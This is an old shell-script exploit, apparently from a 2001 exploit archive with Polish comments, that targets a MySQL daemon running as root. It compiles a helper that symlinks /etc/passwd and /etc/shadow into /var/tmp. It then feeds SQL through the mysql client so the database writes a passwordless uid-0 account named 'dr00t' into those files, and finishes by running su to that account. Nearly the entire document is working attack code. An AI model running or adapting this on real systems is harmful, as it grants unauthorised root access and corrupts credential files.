#!/bin/sh # this is lame sploit for a 0:0 mysqld proces only # =) fshystko 4 m.sz clear echo '._____________________________________________________________.' echo '| amfetamina i.n.c & speed i.n.c" |' echo '|-------------------------------------------------------------|' echo '|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|' echo '| presents |' echo '|-------------------------------------------------------------|' echo '| amorphis akka spidi |' echo '| MySQL xsploit |' echo '| special for mysql-3.20.32 |' echo '| but other versions so also vulnerabile |' echo '| maybe broken |' echo '._____________________________________________________________.' echo "please wait : " echo -n 'trying ... :' if [ -x /usr/bin/mysql ]; then echo -n '.' else echo ' Err ' exit 1 fi #to w sumie zupelnie nie potrzebne %) ale co tam cat >/var/tmp/mysql.c<<__eof__ main() { system("ln -s /etc/passwd /var/tmp/gotcha.ISD"); system("ln -s /etc/shadow /var/tmp/kreska.ISD"); } __eof__ sleep 1 echo -n '.' cc /var/tmp/mysql.c -o /var/tmp/linkuj sleep 1 echo -n 'o' if [ -f /var/tmp/linkuj ]; then echo -n 'oOOoo..' chmod +x /var/tmp/linkuj /var/tmp/linkuj else echo ' !Err!' exit 1 fi echo ": part one wporzo " echo echo echo "Teras podaj :" echo -n 'mysql login :' read $login echo -n 'mysql password :' read $pass echo -n 'mysql hostname :' read $host cat >/var/tmp/sploit<<__eof__ create table gotcha(qqq varchar(255)); create table kreska(qqq varchar(255)); insert into gotcha values('\ndr00t::0:0:narkoman:/:/bin/sh\n'); insert into kreska values('\ndr00t::1:0:99999:7:-1:-1:\n'); __eof__ echo "Wait .. " sleep 1 cd /tmp cat /var/tmp/sploit |mysql -u $login -h $host -p $pass '../../tmp' sleep 3 echo "..ooOO#" rm /var/tmp/sploit rm /var/tmp/mysql.c /var/tmp/linkuj /var/tmp/gotcha.ISD /var/tmp/kreska.ISD if [ 'cat /etc/passwd |grep dr00t' = 'dr00t::0:0:narkoman:/:/bin/sh' ];then echo ' ok i have a root :>>>>> ' su - dr00t else echo 'ch00y cos musiales zjebac ' fi # www.hack.co.za [09 April 2001]